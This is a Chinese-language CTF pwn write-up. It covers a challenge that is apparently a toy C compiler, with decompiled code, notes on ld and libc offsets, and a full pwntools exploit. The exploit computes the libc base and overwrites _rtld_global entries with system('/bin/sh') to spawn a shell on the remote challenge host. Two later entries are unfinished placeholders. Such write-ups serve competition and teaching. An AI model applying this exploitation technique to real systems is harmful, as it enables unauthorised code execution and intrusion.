qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; if ( qword_206070 == 128 ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = -qword_2060A8; sub_B70(); } else { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = -1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(162LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL; } qword_206078 = 1LL; break; default: if ( qword_206070 != 162 && qword_206070 != 163 ) { printf("%d: bad expression\n", qword_206098); exit(-1); } v20 = qword_206070; sub_B70(); sub_16CB(162LL); if ( *(_QWORD *)qword_206088 == 10LL ) { *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 10LL; } else { if ( *(_QWORD *)qword_206088 != 9LL ) { printf("%d: bad lvalue in pre-increment\n", qword_206098); exit(-1); } *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 9LL; } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 <= 2 ) v4 = 1LL; else v4 = 8LL; *(_QWORD *)qword_206088 = v4; qword_206088 = (char *)qword_206088 + 8; if ( v20 == 162 ) v5 = 25LL; else v5 = 26LL; *(_QWORD *)qword_206088 = v5; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 ) v6 = 11LL; else v6 = 12LL; *(_QWORD *)qword_206088 = v6; break; } while ( qword_206070 >= a1 ) { v21 = qword_206078; switch ( qword_206070 ) { case 142LL: sub_B70(); if ( *(_QWORD *)qword_206088 != 10LL && *(_QWORD *)qword_206088 != 9LL ) { printf("%d: bad lvalue in assignment\n", qword_206098); exit(-1); } *(_QWORD *)qword_206088 = 13LL; sub_16CB(142LL); qword_206088 = (char *)qword_206088 + 8; qword_206078 = v21; if ( v21 ) v7 = 11LL; else v7 = 12LL; *(_QWORD *)qword_206088 = v7; break; case 143LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 4LL; qword_206088 = (char *)qword_206088 + 8; v23 = qword_206088; sub_16CB(142LL); if ( qword_206070 != 58 ) { printf("%d: conditional missing colon\n", qword_206098); exit(-1); } sub_B70(); *v23 = (char *)qword_206088 + 24; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 2LL; qword_206088 = (char *)qword_206088 + 8; v8 = qword_206088; sub_16CB(143LL); *v8 = (char *)qword_206088 + 8; break; case 144LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 5LL; qword_206088 = (char *)qword_206088 + 8; v9 = qword_206088; sub_16CB(145LL); *v9 = (char *)qword_206088 + 8; qword_206078 = 1LL; break; case 145LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 4LL; qword_206088 = (char *)qword_206088 + 8; v10 = qword_206088; sub_16CB(146LL); *v10 = (char *)qword_206088 + 8; qword_206078 = 1LL; break; case 146LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(147LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 14LL; qword_206078 = 1LL; break; case 147LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(148LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 15LL; qword_206078 = 1LL; break; case 148LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(149LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 16LL; qword_206078 = 1LL; break; case 149LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(151LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 17LL; qword_206078 = 1LL; break; case 150LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(151LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 18LL; qword_206078 = 1LL; break; case 151LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(155LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 19LL; qword_206078 = 1LL; break; case 152LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(155LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 20LL; qword_206078 = 1LL; break; case 153LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(155LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 21LL; qword_206078 = 1LL; break; case 154LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(155LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 22LL; qword_206078 = 1LL; break; case 155LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(157LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 23LL; qword_206078 = 1LL; break; case 156LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(157LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 24LL; qword_206078 = 1LL; break; case 157LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(159LL); qword_206078 = v21; if ( v21 > 2 ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL; } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 25LL; break; case 158LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(159LL); if ( v21 <= 2 || v21 != qword_206078 ) { qword_206078 = v21; if ( v21 > 2 ) { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL; } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 26LL; } else { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 26LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 28LL; qword_206078 = 1LL; } break; case 159LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(162LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL; qword_206078 = 1LL; break; case 160LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(162LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 28LL; qword_206078 = 1LL; break; case 161LL: sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(162LL); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 29LL; qword_206078 = 1LL; break; default: if ( qword_206070 != 162 && qword_206070 != 163 ) { if ( qword_206070 != 164 ) { printf("%d: compiler error tk=%d\n", qword_206098, qword_206070); exit(-1); } sub_B70(); qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; sub_16CB(142LL); if ( qword_206070 != 93 ) { printf("%d: close bracket expected\n", qword_206098); exit(-1); } sub_B70(); if ( v21 <= 2 ) { if ( v21 <= 1 ) { printf("%d: pointer type expected\n", qword_206098); exit(-1); } } else { qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 8LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 27LL; } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 25LL; qword_206088 = (char *)qword_206088 + 8; qword_206078 = v21 - 2; if ( v21 == 2 ) v16 = 10LL; else v16 = 9LL; *(_QWORD *)qword_206088 = v16; } else { if ( *(_QWORD *)qword_206088 == 10LL ) { *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 10LL; } else { if ( *(_QWORD *)qword_206088 != 9LL ) { printf("%d: bad lvalue in post-increment\n", qword_206098); exit(-1); } *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 9LL; } qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 <= 2 ) v11 = 1LL; else v11 = 8LL; *(_QWORD *)qword_206088 = v11; qword_206088 = (char *)qword_206088 + 8; if ( qword_206070 == 162 ) v12 = 25LL; else v12 = 26LL; *(_QWORD *)qword_206088 = v12; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 ) v13 = 11LL; else v13 = 12LL; *(_QWORD *)qword_206088 = v13; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 13LL; qword_206088 = (char *)qword_206088 + 8; *(_QWORD *)qword_206088 = 1LL; qword_206088 = (char *)qword_206088 + 8; if ( qword_206078 <= 2 ) v14 = 1LL; else v14 = 8LL; *(_QWORD *)qword_206088 = v14; qword_206088 = (char *)qword_206088 + 8; if ( qword_206070 == 162 ) v15 = 26LL; else v15 = 25LL; *(_QWORD *)qword_206088 = v15; sub_B70(); } break; } } return __readfsqword(0x28u) ^ v24; }
赛后了解到这是个 C 语言编译器,有一些限制,函数只能调用一次
函数和变量类型也只能用程序给的,程序主要利用点我这里是 gdb 调试出来的
通过 gdb 断点可以发现,我们定义的变量都在 ld 的可写段上
由于有不同 ld 对于 libc 偏移不一样,但同一 ld 对于 libc 偏移都一样的特性
我们可以得到带有 libc 地址的变量,之后程序会调用 exit 退出,但 exit 的参数是不定的
所以我就想靠 _rtld_global 来进行提权,因为 one_gadget 成功的机率太小,所以我用的是system("/bin/sh");
这题坑点就是在正常的 ld 上运行程序的话,指针和 libc 的偏移是 0x506XXX
但是远程环境对不上,是 0x529XXX 的偏移,以后做这类题可以考虑按页爆破了
这里还有一点是,假如我不在程序后面加上exit(0);
,那么使用 one_gadget 提权的可能性就微乎其微
而加上后只有第四个 one_gadget(0xf1147) 能正常使用
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('182.92.73.10', 24573) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False) # gdb.attach(p, "b exit\nb *$rebase(0x44D6)" + "\nc") # gdb.attach(p, "b _dl_fini\nc") pd = ''' int *tmp; int *libcbase; int *addr_system; int *addr_bin_sh; int *addr__rtld_global_3848; int *addr__rtld_global_2312; void main(){ libcbase = (int)&tmp - 0x529010; addr_system = (int)libcbase + 0x45390; addr_bin_sh = (int)libcbase + 0x18cd57; addr__rtld_global_3848 = (int)libcbase + 0x5f0040 + 3848; addr__rtld_global_2312 = (int)libcbase + 0x5f0040 + 2312; *addr__rtld_global_3848 = addr_system; *addr__rtld_global_2312 = *addr_bin_sh; } ''' p.sendlineafter('ng...', pd) p.interactive()
Flag:
动态靶机
boom2(未完)
文件存于:https://quqi.gblhgk.com/s/911627/2n6ziVZeKwCdZXRn
貌似也是一道 vmpwn
Description:
nc 182.92.73.10 36642
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
test
exp 如下:
test
Flag:
动态靶机
faster0(未完)
盲 Pwn,听说是 AEG,等官方开放题目吧
Description:
nc 39.96.72.181 42732
Solution:
盲 Pwn
程序保护如下:
test
main 函数如下:
test
exp 如下:
test
Flag:
动态靶机